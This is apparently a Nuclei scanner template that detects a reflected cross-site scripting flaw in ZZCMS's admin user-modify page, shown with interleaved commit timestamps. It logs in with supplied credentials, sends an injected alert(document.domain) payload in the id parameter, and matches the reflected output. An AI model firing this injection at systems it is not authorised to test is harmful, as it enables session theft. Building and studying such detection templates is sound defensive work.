2022-04-16 09:02:25 +00:00
id : zzcms-xss
info :
2022-07-24 15:46:05 +00:00
name : ZZCMS - Cross-Site Scripting
2022-04-16 09:02:25 +00:00
author : ritikchaddha
2022-09-23 17:53:08 +00:00
severity : high
description : ZZCMS contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
2022-04-16 09:02:25 +00:00
reference :
- https://github.com/JcQSteven/blog/issues/20
2022-09-23 17:53:08 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-07-24 13:43:49 +00:00
metadata :
verified : true
tags : zzcms,xss,authenticated
2022-04-16 09:02:25 +00:00
requests :
2022-07-24 13:43:49 +00:00
- raw :
- |
POST /admin/logincheck.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-04-16 09:02:25 +00:00
2022-07-24 13:43:49 +00:00
admin={{username}}&pass={{password}}
2022-04-16 09:02:25 +00:00
2022-07-24 13:43:49 +00:00
- |
GET /admin/usermodify.php?id=1%22%2balert(document.domain)%2b%22 HTTP/1.1
Host : {{Hostname}}
2022-04-16 09:02:25 +00:00
2022-07-24 13:43:49 +00:00
cookie-reuse : true
req-condition : true
matchers :
- type : dsl
dsl :
- "contains(all_headers_2, 'text/html')"
- "status_code_2 == 200"
- 'contains(body_2, "参数 1\"+alert(document.domain)+")'
condition : and
2022-09-23 17:53:08 +00:00
# Enhanced by mp on 2022/09/23